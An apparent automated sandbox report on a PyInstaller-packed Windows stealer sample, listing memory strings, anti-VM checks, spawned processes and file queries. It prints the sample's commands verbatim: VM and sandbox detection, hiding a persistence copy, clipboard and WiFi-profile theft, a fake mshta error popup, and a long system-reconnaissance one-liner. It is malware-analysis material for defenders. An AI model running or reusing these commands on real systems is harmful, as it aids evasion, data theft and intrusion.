Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hostNames = ['sandbox','cuckoo', 'vm', 'virtual', 'qemu', 'vbox', 'xen']
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "vmacthlp.exe", # VMware
Source: 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if b'VMware' in stdout:
Source: 9afaXJv52z.exe, 00000002.00000003.1560814948.0000020DB06E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Windows\System32\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\9afaXJv52z.exe

Code function: 0_2_00007FF6850BC57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF6850BC57C

Source: C:\Users\user\Desktop\9afaXJv52z.exe

Code function: 0_2_00007FF6850D3AF0 GetProcessHeap,

0_2_00007FF6850D3AF0

Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850BC57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6850BC57C
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850BC760 SetUnhandledExceptionFilter,	0_2_00007FF6850BC760
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850BBCE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF6850BBCE0
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850CABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6850CABD8

HIPS / PFW / Operating System Protection Evasion

DLL side loading technique detected

Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll

Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Users\user\Desktop\9afaXJv52z.exe C:\Users\user\Desktop\9afaXJv52z.exe	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "chcp"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-\|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\HOSTNAME.EXE hostname
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\query.exe query user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net localgroup
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net localgroup administrators
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net user guest
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\System32\query.exe	Process created: C:\Windows\System32\quser.exe C:\Windows\system32\quser.exe
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
Source: C:\Windows\System32\net.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-\|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-\|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-\|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-\|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"

Source: C:\Users\user\Desktop\9afaXJv52z.exe

Code function: 0_2_00007FF6850D9E40 cpuid

0_2_00007FF6850D9E40

Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\attrs-23.1.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\attrs-23.1.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\attrs-23.1.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\attrs-23.1.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography-41.0.7.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography-41.0.7.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography-41.0.7.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography-41.0.7.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography-41.0.7.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography-41.0.7.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\attrs-23.1.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\cryptography-41.0.7.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\frozenlist VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\libcrypto-1_1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\libffi-8.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\libssl-1_1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\multidict VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\pyexpat.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\python3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\python311.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\sqlite3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\VCRUNTIME140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\yarl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_asyncio.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_cffi_backend.cp311-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_multiprocessing.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_overlapped.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_uuid.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
